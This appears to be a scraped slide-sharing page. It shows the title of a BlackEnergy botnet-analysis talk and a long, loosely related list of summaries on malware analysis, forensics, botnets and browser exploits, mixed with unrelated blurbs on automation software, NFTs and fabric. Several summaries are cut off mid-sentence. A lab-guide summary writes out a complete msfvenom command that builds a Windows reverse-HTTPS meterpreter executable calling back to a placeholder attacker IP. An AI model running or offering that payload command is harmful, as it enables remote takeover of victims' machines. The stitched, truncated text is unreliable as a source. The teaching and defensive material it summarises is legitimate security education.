From the infection phase to the command & control functionality, this talk is a 360-degree analysis of a recent Russian botnet distribution package. Particular features of this botnet are communication over the HTTP protocol and the use of PHP and MySQL.
This document summarizes several Windows registry keys and artifacts that can provide information about a user's digital activities. It describes keys that track recently opened files, installed applications, browser history and search terms, network connections, and more. Examining these locations can reveal details like the files and websites a user accessed, when they were accessed, and from where they originated.
CNIT 126: 10: Kernel Debugging with WinDbg - Sam Bowne
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_F19.shtml
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak... - CODE BLUE
Japan is recently experiencing a rise in targeted attacks. However, it is rare that details of such attacks are revealed. Under this circumstance, JPCERT/CC has been investigating the attack operations targeting Japanese organizations including the government and leading enterprises. We have especially been tracking two distinct cases over a prolonged period.
The first case, which became public in 2015, drew nationwide attention for victimizing several Japanese organizations. In this case, the attacker conducts sophisticated attacks through network intrusion and targeting weak points of the organizations.
The second case has been continuously targeting certain Japanese organizations since 2013. Although this case has not drawn as much attention, the attacker has advanced techniques and uses various interesting attack methods.
This presentation will introduce the above two attack operations, including attack techniques we revealed through prolonged investigation, the malware/tools being used, as well as useful techniques/tools for analyzing related malware.
Anomalies Detection: Windows OS - Part 1 - Rhydham Joshi
Anomalies Detection: Windows OS - Part 1 describes malware investigation steps in detail. It focuses on identifying process anomalies, rootkit detection,
A college lecture at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_S17.shtml
- Malware analysis involves both static and dynamic analysis techniques to understand malware behavior and assess potential damage. Static analysis involves disassembling and reviewing malware code and structure without executing it. Dynamic analysis observes malware behavior when executed in an isolated virtual environment.
- Tools for static analysis include file hashing, string extraction, and PE header examination. Dynamic analysis tools monitor the registry, file system, processes, and network traffic created by malware runtime behavior. These include Process Monitor, Wireshark, Process Explorer, and network sniffers.
- To safely conduct malware analysis, one should create an isolated virtual lab separated from production networks, and install behavioral monitoring and code analysis tools like OllyDbg, Process Monitor, and Wiresh
Practical Malware Analysis: Ch 10: Kernel Debugging with WinDbg - Sam Bowne
This document discusses using WinDbg for kernel debugging and analyzing rootkits. It explains that WinDbg can debug in both user-mode and kernel-mode, unlike OllyDbg which is only for user-mode. Device drivers run code in the Windows kernel and are difficult to analyze. The DriverEntry routine is called when a driver is loaded and it registers callback functions. Malware often imports functions from Ntoskrnl.exe and Hal.dll to manipulate the kernel. WinDbg commands like bp, lm, and dt are demonstrated for setting breakpoints, listing modules, and viewing structures. Symbol files from Microsoft provide function and structure names to make debugging easier.
The document provides an overview of exploit kits, including common exploit kit names (e.g. Fiesta, Angler), the phases of an exploit kit attack (compromised site, redirector, landing page, post-infection traffic), exploits used across browsers/plugins (e.g. IE, Java, Flash), evasion techniques (e.g. obfuscation), and includes a technical analysis of the CVE-2014-0515 Flash exploit.
Hunting Lateral Movement in Windows Infrastructure - Sergey Soldatov
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
This document discusses fileless attacks, which use existing software and authorized protocols to carry out malicious activities without downloading files. Fileless attacks can use things like PowerShell, WMI, browsers, and Office applications to connect to command and control servers and execute malicious scripts in memory only. Some behaviors and evidence of fileless attacks include unusual child processes starting, legitimate DLLs loading from unexpected parents, and applications like Word or Excel invoking PowerShell or making network connections. The document demonstrates detecting fileless attacks using Event IDs in Windows logs related to process creation and PowerShell pipeline execution details.
This document discusses various types of malware behaviors including downloaders and launchers, backdoors, credential stealers that use techniques like GINA interception, hash dumping tools like Pwdump, keystroke loggers, and persistence mechanisms like registry modifications and DLL load-order hijacking. It also covers user-mode rootkits that hide malware by hooking the import address table or inline hooking API functions.
This document provides a summary of key Volatility plugins and memory analysis steps. It outlines plugins for identifying rogue processes, analyzing process DLLs and handles, reviewing network artifacts, checking for code injection evidence, looking for rootkit signs, and dumping suspicious processes/drivers. The document also provides information on memory acquisition, converting hibernation files and dumps, artifact timelining, and registry analysis plugins.
This document discusses forensic analysis on Windows systems. It provides an overview of important Windows artifacts for forensic investigation including the registry, event logs, file system metadata and memory analysis. Specific tools are also mentioned for acquiring disk and memory images, parsing timelines, analyzing the registry and memory, including FTK Imager, SIFT, Redline, Volatility and REGRIPPER. An example case is described where crypto-mining malware was found running on a system through analysis of process listings, file system metadata and logs.
One-Byte Modification for Breaking Memory Forensic Analysis - Takahiro Haruyama
The document proposes a one-byte modification method to potentially abort memory forensic analysis tools without impacting the running system or hiding specific objects. It identifies three sensitive operations in memory analysis: 1) virtual address translation in kernel space, 2) guessing the OS version and architecture, and 3) getting kernel objects like processes. For each operation, it outlines how top tools like Volatility and Memoryze perform the operation and identifies specific "abort factors", or one-byte values that could be modified to abort the analysis without direct detection. Modifying these factors could stop analysis tools from functioning properly without blue screening the system or hiding specific objects.
This document introduces tools and techniques for preliminary malware analysis. It discusses examining malware behavior through static analysis, behavioral tracing, and sandboxing. Specific tools are presented for observing malware snapshots, tracing its behavior, and containing it in a sandbox. Process-based and stealthy malware are discussed, along with vulnerabilities of rootkits and tools for rootkit detection. The goal is to present a model for beginning reverse engineering of malware through observation and experimentation in a contained environment.
This document provides an overview of analyzing Windows crashes. It discusses introducing the Driver Verifier tool to identify code defects in drivers, using kernel debuggers to view crash dumps and perform basic crash analysis, and advanced debugging techniques like attaching a kernel debugger for debugging initialization failures. The document also covers the author's experience of 7 years at Microsoft and 3 years at Digital Equipment Corporation, as well as instructor experience with David Solomon.
Kunal - Introduction to BackTrack - ClubHack2008 - ClubHack
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Common attack techniques explored include man-in-the-middle attacks using ARP poisoning, password cracking through tools like John the Ripper, and hacking web servers through techniques like Google hacking.
BackTrack is a Linux distribution focused on penetration testing with over 300 security tools. It allows testing of vulnerabilities like buffer overflows and cross-site scripting through tools like Nmap, Nikto, and Metasploit. Attackers can use these tools along with techniques like ARP poisoning to conduct remote exploits or hack passwords on Windows systems.
This document summarizes Ajit Skanda Kumarawamy's literature study presentation on botnet detection and mitigation techniques. It introduces topics like the Storm worm, BotHunter, BotSniffer, RBSeeker, and the Torpig botnet takeover. Detection methods discussed include signature-based and anomaly-based detection. Mitigation generally involves acquiring and analyzing bots, infiltrating the botnet, and identifying and taking down the command-and-control server and botmaster. Case studies provide examples of analyzing botnet infrastructure and behaviors.
The document describes a global botnet detector that was created to detect botnet activity across multiple countries in near real-time. It works by aggregating web traffic data from various sites, calculating correlations between traffic from different countries, and flagging coordinated spikes as potential botnet alerts. It then analyzes user behavior from the flagged countries to produce a list of suspect botnet participants and their threat scores. The tool was able to successfully detect a real botnet attack and identify all of the users responsible based on an investigation for a customer. Future work could integrate it into a machine learning product and address limitations like intra-country botnet activity.
This document summarizes a study on botnet detection techniques. It outlines that botnets pose a serious cybersecurity threat and discusses various botnet detection approaches including signature-based, anomaly-based, host-based, and network-based methods. The document then focuses on two proposed techniques: 1) Using an adaptive learning rate neural network to detect HTTP botnets based on TCP connection features. Evaluation shows it achieved over 99% detection accuracy. 2) Using a Hidden Semi-Markov Model with SNMP MIB variables to characterize normal network behavior and detect botnets, achieving over 98% accuracy on spyware and BlackEnergy botnets.
The Godfather - P2P Botnets: Security & Communication - ArturBalanuta
This document discusses peer-to-peer botnets. It covers how botnets are propagated through various means like phishing, social engineering, infected files, and mobile device infections. It then discusses different models for organizing botnets, including centralized command and control, unstructured control, and peer-to-peer overlay networks. The rest of the document focuses on designing a secure peer-to-peer botnet including topics like peer entry, secure dissemination of commands, peer-to-peer trust systems, proof-of-work, and monetization models.
Course material from the trainees Mehdi, Iskander and Christopher of the "Expert sécurité digitale 5" session at the Aston school.
The objective of this exercise is to build a botnet in order to understand its mechanisms and so defend against them better.
The materials and videos are available at https://expertsecuritedigitale.blogspot.fr/
The Harvester, the Botmaster, and the Spammer: On the Relations Between the D... - Gianluca Stringhini
This document analyzes the relationships between different actors in spam operations. It fingerprints email harvesters, botnets, and spammers by analyzing their behaviors and techniques. It finds that 9 harvesters were used to collect over 600 email addresses. 2,024 spam emails were sent by 7 botnet dialects. Spam campaigns were clustered by topic and different spammers were found to use the same botnets and email lists over long periods of time. The study presents the first end-to-end analysis of the spam delivery ecosystem and finds spammers leverage the same resources for mitigation.
Cryptovirology Introduction, Security Threats, Safeguards and Countermeasures - M Mehdi Ahmadian
Introduction to cryptovirology, security threats, and protection and countermeasure strategies
Advanced Malware Analysis Training Session 2 - Botnet Analysis Part 1 - securityxploded
This presentation is part of our Advanced Malware Analysis Training Series program.
For more details, refer to our Security Training page:
http://securityxploded.com/security-training.php
The document proposes a design for an advanced hybrid peer-to-peer botnet that is harder for defenders to detect and shut down. It describes existing centralized botnets that rely on command-and-control servers that can be shut down. The proposed design uses a hybrid peer-to-peer architecture with servent and client bots to distribute commands across the network in a decentralized way. It also describes how the botmaster can monitor the entire botnet by having bots report information directly. Defenders could use honeypots to detect and block the botnet, but it may still be difficult to monitor without exposing the honeypots.
The document discusses malware analysis techniques including static analysis, dynamic analysis, and memory analysis. Static analysis involves examining a file without executing it to determine things like file type and cryptographic hash. Dynamic analysis involves executing malware in a controlled environment to observe its behavior, such as file system, process, registry, and network activity. Memory analysis examines a computer's RAM to find artifacts and reveal hidden processes, network connections, and registry modifications. The document provides examples of analyzing a Zeus bot sample using these techniques.
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis - securityxploded
This presentation is part of our Reverse Engineering & Malware Analysis Training program.
For more details, refer to our Security Training page:
http://securityxploded.com/security-training.php
This document discusses various tools and techniques for performing basic dynamic malware analysis, including sandboxes, Process Monitor, Process Explorer, and Regshot. It explains how sandboxes like GFI Sandbox can provide initial analysis of malware but have limitations. Process Monitor and Process Explorer allow monitoring processes, registry changes, and other activity in real-time. Regshot facilitates comparing registry snapshots before and after malware is run.
Cyber Defense Forensic Analyst - Real World Hands-on Examples - Sandeep Kumar Seeram
The document discusses analyzing malware using static and dynamic analysis techniques. Static analysis involves examining a malware file's code and structure without executing it, using tools like disassemblers and string extractors. Dynamic analysis executes malware in a controlled environment to observe its behaviors and any changes it makes. The document then demonstrates analyzing the "Netflix Account Generator" malware using an isolated cloud sandbox, where it is observed starting child processes and making outbound network connections, suggesting it is a remote access trojan.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... - CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
This malware analysis document discusses a piece of malware that disguises itself as an MSN and Yahoo updater. It unpacks itself using UPX and WinRAR, then modifies the registry and loads HTML files to redirect the user to malicious sites and install adware. The malware aims to circumvent security settings and install additional software onto the system.
The document describes a procedure for using batch scripting and common tools to identify intrusions on a Microsoft Windows system. The script generates trending data by checking for unusual processes, services, accounts, files and connections. It analyzes the operating system version, registry entries, scheduled tasks, event logs and more. The final summary is a sample batch script that automates running various commands to collect security-related data and output it to log files for administrator review.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx - pauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.
Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type the following command in the terminal window and press Enter:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads, such as shellcode and reverse shells, packaged as malicious executables. The following page shows the different kinds of malicious shells that can be made with msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 for this malicious activity is the safest choice for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and on LANs (Local Area Networks). It is the default port for TLS traffic (mostly encrypted web traffic).
msfvenom uses the reverse_https payload to create the malicious file. Once the victim runs it, the malicious file makes a reverse HTTPS connection between the victim's and the attacker's computers.
The other parameters of msfvenom are more straightforward. x86 specifies t.
Malware analysis is important for responding quickly to security incidents and keeping costs down. Malware is the number one external threat and is adapting to evade traditional defenses like firewalls and antivirus software. When incidents do occur, organizations should have an in-house capability to analyze malware using free and open-source tools to understand the scope of infections and prevent recurrences.
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx - eugeniadean34240
RUNNING HEAD: MANAGING HOST BASED SECURITY IN WINDOWS 8.1
Lab Deliverable for Lab 2
a. Procedure to Manage Windows Defender
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Description:
This Windows configuration project requires system administrator permission in order to access the programs and learn how each is commanded to perform the action it should. Also, to use a virtual box one should know how to operate it and explore the virtual programs.
Notes, Warnings and Restrictions:
1. Windows Defender comes with Windows 8.1 and is found in the Control Panel.
2. The application can only be used when you log in to your system as an administrator or have been permitted to act as the administrator.
3. For Windows Defender to run on the system it should be turned on and no other antivirus should be active.
4. Scanning the system with Windows Defender deletes infected files. Also ensure you do the required scanning.
5. If a different antivirus was previously deleted, then Windows Defender needs to be turned off and restarted.
Resources (Further Reading):
Firewalls. (n.d.). Retrieved from https://technet.microsoft.com/en-us/library/cc700820.aspx
Microsoft Baseline Security Analyzer. (2011). Retrieved from https://dougvitale.wordpress.com/2011/11/18/microsoft-baseline-security-analyzer/
CloudFlare. (n.d.). Retrieved from https://www.winhelp.us/configure-windows-defender-in-windows-8.html
Procedures:
Windows defender
Windows Defender protects a computer system against any form of malware by running in the background of the computer system and giving a notification if any suspicious item is found on the system, so that the user can take action. It can also be used to scan the system if the system has issues, e.g. becomes slow, switches off when not commanded to, hangs, among other things. Windows Defender should be updated over time so that it is not outdated and also to improve its performance.
Windows Defender is found in the Control Panel; the steps to open it are:
i. Open Control Panel and select “Windows Defender”
ii. When you click on Windows Defender, the following page appears
a) To update the system, click on “Update”
b) Real-time scanning
c) The full scan results will appear in the table as shown below
d) For quick results, check the button just before you click on Scan. The results will then appear as shown below.
e) To scan a removable device, select “Settings” and click on “Advanced”
Then check the box just before removing any removable drives and click Save
b. Procedure to configure Windows Firewall for Windows 8.1
Operating Environment:
1. Operating System: Windows 8.1 Pro
2. Hardware: A Laptop
3. Software: VMware Horizon Client Installed
Descriptions:
Windows Firewall is a protection application that protects against suspicious items. It helps in blocking suspicious programs.
Matt Oh, Microsoft
We are seeing new techniques used every day by malware. But it is very hard to find any impressive techniques used in the wild. Recently there was a huge buzz about the Detrahere malware, which used internally known issues with certificate signing in Windows 10 kernel drivers. Even though the certificate check bypass technique itself is very interesting, I also found that the tactics used by the malware are more impressive. Even though the malware is mainly focused on ad-hijacking functionality through Netfilter driver installation, it also has rootkit ability through file system driver hooking. This feels like the old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds them. The unpacking process can be a very challenging job, too, as it uses a kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run the unpacked code. Our PatchGuard does not seem to trigger on this action, because all the sections are already pre-allocated with execute permission.
Through this talk, I want to present the various techniques used by this malware, focusing on kernel-level obfuscation and anti-analysis tactics. This will give us new insights into what new Windows rootkit malware might look like in the future and how detecting it from security systems and detonation systems can be a challenge.
The Crisis malware is an advanced malware that infects both Windows and Mac computers. It has the ability to steal browser history, contacts, audio/visual recordings and more. It spreads initially through a signed Java applet and then installs core modules and drivers onto the infected system. Both Windows and Mac versions share similar information stealing and command and control capabilities. The Windows version uniquely targets virtual machines by mounting and infecting VM disk images, and can also steal social media and email account information. The malware authors remain anonymous but the code quality suggests it was intended for espionage or private investigation.
SANS Digital Forensics and Incident Response Poster 2012 - Rian Yulian
This document outlines a 13-step process for analyzing a system for signs of malware infection. The steps include: reducing evidence files, performing antivirus checks, searching for indicators of compromise, automated and manual memory analysis, checking for persistence mechanisms, entropy/packing analysis, reviewing event logs, timeline analysis, third-party hash lookups, and analyzing MFT and file time anomalies. The goal is to methodically narrow down thousands of files to the few most likely to be malware through successive rounds of filtering and examination.
Reversing & malware analysis training part 9 advanced malware analysis - Abdulrahman Bassam
The document discusses a training program on reverse engineering and malware analysis. It provides an overview of static analysis, dynamic analysis and memory analysis techniques. It also includes a demonstration of analyzing a Zeus bot sample using these techniques. The demonstration shows taking the cryptographic hash, determining imports, submitting to VirusTotal, monitoring process, registry and network activity while executing in a sandbox, analyzing the memory dump with Volatility and more.
The document summarizes a presentation given by Tomer Teller about the Stuxnet malware. It describes how Stuxnet infected industrial control systems by exploiting Windows vulnerabilities, spreading on removable drives, and ultimately reprogramming PLCs to sabotage Iran's nuclear program. Key infection techniques discussed include exploiting LNK and Print Spooler vulnerabilities, using autorun.inf files and rootkit techniques to propagate, and replacing DLL files to monitor and inject commands to PLCs.
This document provides an overview of reversing and malware analysis training. It discusses the purpose of malware analysis, different analysis techniques including static analysis, dynamic analysis and memory analysis. It provides examples of tools used for each technique like strings, PEview, and Volatility. The document demonstrates these concepts on a Zeus bot sample, showing its network activity, process and registry behavior through monitoring tools. Memory analysis with Volatility reveals hidden processes and network connections. The training aims to understand a malware's behavior and interaction with the system.
HoneyNet SOTM 32 - Windows Malware Analysis - Chetan Ganatra
The document provides details about analyzing a malware binary called RaDa.exe. It describes initial setup steps like verifying the file integrity and checking for known viruses. The binary was found to be packed with UPX but modified after compression to prevent decompression. Through static and dynamic analysis, it was determined that RaDa.exe installs itself to automatically run on startup, tries flooding a target IP address, and has capabilities to upload files via HTTP. A Snort signature is proposed to detect similar malware specimens. The document also lists techniques used in the binary to prevent reverse engineering like stripping debugging information and packing.
This document discusses techniques for threat hunting on Windows systems. It covers key areas to focus on during incident triage like processes, network connections, filesystem artifacts and logs. It also describes general hunting scenarios using threat intelligence or without intelligence. Specific techniques and artifacts discussed include the Windows Task Scheduler, ShimCache, AmCache, RecentFileCache, rogue services, timeline analysis using MFT, DLL side loading, DLL injection rootkits, autoruns, and the Wdigest credential storage downgrade attack. The document provides details on what to look for and analyze to effectively hunt for threats on Windows.
UEFI Firmware Rootkits: Myths and Reality - Sally Feller
Earlier this month, we teased a proof of concept for UEFI ransomware which was presented at RSA Conference 2017. The HackingTeam, Snowden, Shadow Brokers, and Vault7 leaks have revealed that UEFI/BIOS implants aren't just a theoretical concept but have actually been weaponized by nation states to conduct cyber espionage. Physical access requirements are a thing of the past: these low-level implants can be installed remotely by exploiting vulnerabilities in the underlying UEFI system.
Today at BlackHat Asia 2017, we are disclosing two vulnerabilities in two different models of the GIGABYTE BRIX platform:
GB-BSi7H-6500 – firmware version: vF6 (2016/05/18)
GB-BXi7-5775 – firmware version: vF2 (2016/07/19)
Similar to Black Energy18 - Russian botnet package analysis (20)
I got 99 trends and a # is all of them or How we found over 100 200+ RCE vulnerabilities in Trend Micro software.
Presentation released at Hack In The Box 2017 Amsterdam, by Roberto Suggi Liverani @malerisch and Steven Seeley @steventseeley.
For more information, please visit: http://blog.malerisch.net or http://srcincite.io
This talk intends to demonstrate how to improve web application security testing by combining browser automation framework and web proxy API.
The goal of this research is to bring a web proxy as close as possible to a browser to achieve a better security testing coverage, especially when dealing with complex client-side technology.
The presentation includes a montage of real case scenarios, showing how this approach can lead to the discovery of vulnerabilities which might otherwise go unnoticed.
Cross Context Scripting (XCS) is a type of XSS (Cross Site Scripting) injection which occurs from an untrusted zone, typically a web page on the Internet into the context of a trusted browser zone.
XSS injection in a trusted browser zone can be 'lethal', as injected payload runs as privileged code. No SOP (Same-Origin Policy) restrictions are enforced and direct interfacing with the underlying OS is possible.
To exploit such bugs, there is no need to use ROP gadgets, spray the heap or attempt other complex techniques. At the opposite, only few elements are required for a successful exploit, such as the right injection point and a tailored exploit payload.
This presentation will examine XCS in details and will provide a demonstration of XCS exploits of both unpatched and patched vulnerabilities in Firefox, Opera, Maxthon and Avant browsers.
Web browsers have become part of everyday life, and are relied upon by millions of internet citizens each day. The feature rich online world has turned the once simple web browser into a highly complex (and very often insecure) desktop application.
As browser vendors have extended functionality and support to new technologies, security researchers and hackers are continuously looking for new vulnerabilities. In this talk, Roberto and Scott will share results of their assiduous browser bug hunting. The talk will examine techniques used to discover critical and less severe vulnerabilities in some of the most popular browsers on the market.
This talk will focus heavily (but not exclusively) on the following areas:
- Memory corruption bugs;
- New approaches to DOM fuzzing;
- Old school techniques against new browser technology;
- Cross Context Scripting and injection attacks;
- SOP Bypass;
The presentation will conclude with a montage of on-stage demonstrations of previously unreleased vulnerabilities, including remote code execution, injections and other tailored browser exploits.
Black Search Engine Optimisation (SEO), often referred as negative SEO, is a term that covers sabotage techniques aiming to reduce a web site's ranking in search engine results. Black SEO techniques are typically used in business and socio-political contexts, such as information warfare.
The presentation will focus on the use of these techniques to discredit a web site by making it vanish from the major search engine result pages. The discussion will also cover how to exploit common web application vulnerabilities such as Cross Site Scripting, SQL injection and other popular exploitation methods to leverage black SEO attacks. Examples will be included to demonstrate each method of exploitation, and how the vulnerabilities can be used to impact revenues and the reputation of business and political targets.
Black SEO attacks represent a unique class of threats and from a security perspective, any threat which can incur a potential loss should be considered a risk. So far, some of these techniques have only existed as a discussion topic in the SEO industry. Consequently, the intent of my presentation is to bring this complex topic to light to the security community.
When performing a security testing, I often sit in a room with other QA and Software testers.
During that time, it is likely I receive questions such as: "Roberto, are you hacking this? Are you breaking
this again? What exactly are you testing?"
Whi l e talking to them I realise there is an information gap between us, especially when they share
information which is essential for my testing and crucial to identify security vulnerabilities.
After a good number of security tests, I came to a conclusion that people in our industry do not realise that
software testing and security testing have a lot to share.
This talk intends to reduce that information gap and provides an introduction to security software testing,
methodologies, and most importantly offers some food for thought to stimulate synergy between security
and software testers
Abstract:
Secure code practices, system hardening, due diligence and due care principles are paramount in mitigating application level DoS attacks. These attacks often result in significant damage against unprepared and vulnerable organisations.
The intent of this talk is to help organisations in strengthening their security posture against such attacks. The talk will explore most common application level DoS attacks and will provide recommendations for protecting applications, detecting attacks and how to react under stressful conditions.
Hundreds of Firefox addons are created every week. Millions of users download them. Some addons are even recommended by the Mozilla community, and users implicitly trust them. We don't trust a single one, and we will show you why.
This talk details how we have abused some of the most popular and recommended Firefox addons, with previously unreleased vulnerabilities. From the Mozilla download statistics, over 15 million users are potentially affected. Demos will cover remote code execution, local file disclosure and other tailored Firefox Addon exploits.
Don't panic - the Addons manager can be found under the 'Tools' tab in your Firefox menu. We expect to see a lot of people clicking the "Uninstall" button after this presentation.
This presentation introduces some of the web spam techniques used against search engines. This talk is complimentary to the presentation "Black SEO Exposed". Some real examples are discussed and illustrated, including exploitation of web application vulnerabilities.
This document provides an overview of JavaScript reversing techniques. It discusses JavaScript technologies like the DOM, Ajax, and JSON. It covers security aspects like the same-origin policy. It provides tips for analyzing JavaScript using tools like Firebug. It also demonstrates finding vulnerabilities like DOM-based XSS and reversing obfuscated JavaScript.
This talk highlights potential attacks against web application using Ajax and XHR technology. The first part of the talk introduces Ajax and related technologies. Second part of the talk focuses on potential attacks and consequences, including some scenario where SOP (Same of origin) policy is bypassed.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
UiPath Community Day Amsterdam: Code, Collaborate, ConnectUiPathCommunity
Welcome to our third live UiPath Community Day Amsterdam! Come join us for a half-day of networking and UiPath Platform deep-dives, for devs and non-devs alike, in the middle of summer ☀.
📕 Agenda:
12:30 Welcome Coffee/Light Lunch ☕
13:00 Event opening speech
Ebert Knol, Managing Partner, Tacstone Technology
Jonathan Smith, UiPath MVP, RPA Lead, Ciphix
Cristina Vidu, Senior Marketing Manager, UiPath Community EMEA
Dion Mes, Principal Sales Engineer, UiPath
13:15 ASML: RPA as Tactical Automation
Tactical robotic process automation for solving short-term challenges, while establishing standard and re-usable interfaces that fit IT's long-term goals and objectives.
Yannic Suurmeijer, System Architect, ASML
13:30 PostNL: an insight into RPA at PostNL
Showcasing the solutions our automations have provided, the challenges we’ve faced, and the best practices we’ve developed to support our logistics operations.
Leonard Renne, RPA Developer, PostNL
13:45 Break (30')
14:15 Breakout Sessions: Round 1
Modern Document Understanding in the cloud platform: AI-driven UiPath Document Understanding
Mike Bos, Senior Automation Developer, Tacstone Technology
Process Orchestration: scale up and have your Robots work in harmony
Jon Smith, UiPath MVP, RPA Lead, Ciphix
UiPath Integration Service: connect applications, leverage prebuilt connectors, and set up customer connectors
Johans Brink, CTO, MvR digital workforce
15:00 Breakout Sessions: Round 2
Automation, and GenAI: practical use cases for value generation
Thomas Janssen, UiPath MVP, Senior Automation Developer, Automation Heroes
Human in the Loop/Action Center
Dion Mes, Principal Sales Engineer @UiPath
Improving development with coded workflows
Idris Janszen, Technical Consultant, Ilionx
15:45 End remarks
16:00 Community fun games, sharing knowledge, drinks, and bites 🍻
Airports, banks, stock exchanges, and countless other critical operations got thrown into chaos!
In an unprecedented event, a recent CrowdStrike update had caused a global IT meltdown, leading to widespread Blue Screen of Death (BSOD) errors, and crippling 8.5 million Microsoft Windows systems.
What triggered this massive disruption? How did Microsoft step in to provide a lifeline? And what are the next steps for recovery?
Swipe to uncover the full story, including expert insights and recovery steps for those affected.
Increase Quality with User Access Policies - July 2024Peter Caitens
⭐️ Increase Quality with User Access Policies ⭐️, presented by Peter Caitens and Adam Best of Salesforce. View the slides from this session to hear all about “User Access Policies” and how they can help you onboard users faster with greater quality.
Using ScyllaDB for Real-Time Write-Heavy WorkloadsScyllaDB
Keeping latencies low for highly concurrent, intensive data ingestion
ScyllaDB’s “sweet spot” is workloads over 50K operations per second that require predictably low (e.g., single-digit millisecond) latency. And its unique architecture makes it particularly valuable for the real-time write-heavy workloads such as those commonly found in IoT, logging systems, real-time analytics, and order processing.
Join ScyllaDB technical director Felipe Cardeneti Mendes and principal field engineer, Lubos Kosco to learn about:
- Common challenges that arise with real-time write-heavy workloads
- The tradeoffs teams face and tips for negotiating them
- ScyllaDB architectural elements that support real-time write-heavy workloads
- How your peers are using ScyllaDB with similar workloads
Understanding the NFT marketplace ecosystem involves exploring platforms for creating, buying, selling, and trading digital assets. These platforms use blockchain technology for security and smart contracts for automated transactions. Key components include digital wallets, NFT standards, and marketplaces like OpenSea and Rarible. This ecosystem is shaped by the roles of creators, collectors, and developers, offering insights into the dynamics and trends of the digital asset economy.
Jacquard Fabric Explained: Origins, Characteristics, and Usesldtexsolbl
In this presentation, we’ll dive into the fascinating world of Jacquard fabric. We start by exploring what makes Jacquard fabric so special. It’s known for its beautiful, complex patterns that are woven into the fabric thanks to a clever machine called the Jacquard loom, invented by Joseph Marie Jacquard back in 1804. This loom uses either punched cards or modern digital controls to handle each thread separately, allowing for intricate designs that were once impossible to create by hand.
Next, we’ll look at the unique characteristics of Jacquard fabric and the different types you might encounter. From the luxurious brocade, often used in fancy clothing and home décor, to the elegant damask with its reversible patterns, and the artistic tapestry, each type of Jacquard fabric has its own special qualities. We’ll show you how these fabrics are used in everyday items like curtains, cushions, and even artworks, making them both functional and stylish.
Moving on, we’ll discuss how technology has changed Jacquard fabric production. Here, LD Texsol takes center stage. As a leading manufacturer and exporter of electronic Jacquard looms, LD Texsol is helping to modernize the weaving process. Their advanced technology makes it easier to create even more precise and complex patterns, and also helps make the production process more efficient and environmentally friendly.
Finally, we’ll wrap up by summarizing the key points and highlighting the exciting future of Jacquard fabric. Thanks to innovations from companies like LD Texsol, Jacquard fabric continues to evolve and impress, blending traditional techniques with cutting-edge technology. We hope this presentation gives you a clear picture of how Jacquard fabric has developed and where it’s headed in the future.
Leading Bigcommerce Development Services for Online RetailersSynapseIndia
As a leading provider of Bigcommerce development services, we specialize in creating powerful, user-friendly e-commerce solutions. Our services help online retailers increase sales and improve customer satisfaction.
How CXAI Toolkit uses RAG for Intelligent Q&AZilliz
Manasi will be talking about RAG and how CXAI Toolkit uses RAG for Intelligent Q&A. She will go over what sets CXAI Toolkit's Intelligent Q&A apart from other Q&A systems, and how our trusted AI layer keeps customer data safe. She will also share some current challenges being faced by the team.
2. Agenda
- Background
- What’s in the package?
